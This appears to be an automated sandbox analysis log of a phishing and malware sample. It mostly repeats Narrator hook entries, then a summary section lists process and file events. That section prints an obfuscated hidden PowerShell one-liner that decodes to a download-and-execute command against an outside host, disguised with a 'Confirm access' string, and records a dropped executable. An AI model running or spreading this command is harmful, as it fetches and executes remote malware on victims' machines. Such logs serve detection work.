              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4284 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4284 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4284 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4284 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4284 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4284 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4284 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4284 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4284 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4284 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4284 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4284 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4284 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4284 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4284 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4284 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7496 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7496 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7496 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7496 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4424 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4424 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4404 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4404 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4404 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4404 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4404 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4404 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4404 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4404 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4404 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4404 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4404 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 2660 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4404 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 2660 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 2660 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 2660 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 2660 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 2660 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4404 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4404 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4404 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4404 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 2660 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 2660 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 2660 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 2660 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4404 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4404 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 6336 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 6336 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7496 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7496 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4404 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4404 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4404 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4404 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4404 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4404 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4404 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4404 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4404 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4404 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4404 call wnd proc C:\Windows\System32\UIAutomationCore.DLL

              System Summary

              barindex
              Powershell drops PE file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeJump to dropped file
              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4256 -s 1500
              Source: unknownProcess created: C:\Windows\System32\AtBroker.exe atbroker.exe /start narrator /hardwarebuttonlaunch
              Source: C:\Windows\System32\AtBroker.exeProcess created: C:\Windows\System32\AtBroker.exe C:\Windows\System32\ATBroker.exe /start narrator /hardwarebuttonlaunch
              Source: C:\Windows\System32\AtBroker.exeProcess created: C:\Windows\System32\AtBroker.exe C:\Windows\System32\ATBroker.exe /start narrator /hardwarebuttonlaunch
              Source: classification engineClassification label: mal100.phis.spyw.evad.win@43/10@30/197
              Source: C:\Windows\System32\Narrator.exeFile created: C:\Users\user\AppData\Local\speech
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:768:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q3sac0ce.ksg.ps1
              Source: C:\Windows\System32\AtBroker.exeFile read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\System32\AtBroker.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2024,i,18405873602495973812,11393449269972753126,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2196 /prefetch:3
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://gtoyorupaz.emlnk9.com/lt.php?x=3DZy~GDFIXeg6XOu0N28Vuee3aIpj_XxwhphY5TIVnag78B-0Uy.y.e-3I2jmN~w"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2024,i,18405873602495973812,11393449269972753126,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2196 /prefetch:3
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: unknownProcess created: C:\Windows\System32\AtBroker.exe atbroker.exe /start narrator /hardwarebuttonlaunch
              Source: C:\Windows\System32\AtBroker.exeProcess created: C:\Windows\System32\AtBroker.exe C:\Windows\System32\ATBroker.exe /start narrator /hardwarebuttonlaunch
              Source: C:\Windows\System32\AtBroker.exeProcess created: C:\Windows\System32\Narrator.exe "C:\Windows\System32\Narrator.exe" /hardwarebuttonlaunch
              Source: C:\Windows\System32\AtBroker.exeProcess created: C:\Windows\System32\Narrator.exe "C:\Windows\System32\Narrator.exe" /hardwarebuttonlaunch
              Source: C:\Windows\System32\AtBroker.exeProcess created: C:\Windows\System32\AtBroker.exe C:\Windows\System32\ATBroker.exe /start narrator /hardwarebuttonlaunch
              Source: C:\Windows\System32\AtBroker.exeProcess created: C:\Windows\System32\Narrator.exe "C:\Windows\System32\Narrator.exe" /hardwarebuttonlaunch
              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "$cmd='';$b='aXdyIGh0dHBzOi8vYXBpb2Vrcy5pY3UvZml4IC1Vc2VCYXNpY1BhcnNpbmd8aWV4';$cmd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b));iex $cmd;$null=' Confirm access - 7891045'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe "C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe" -ServerName:App.AppX2nbh7wcbt82z2dktjrtwk4f36gf9xxh2.mca
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe "C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe" 0xaa79fbd8
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe "C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe" 0xaa79fbd8
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeProcess created: C:\Windows\System32\winver.exe C:\Windows\System32\winver.exe
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeProcess created: C:\Windows\System32\ComputerDefaults.exe
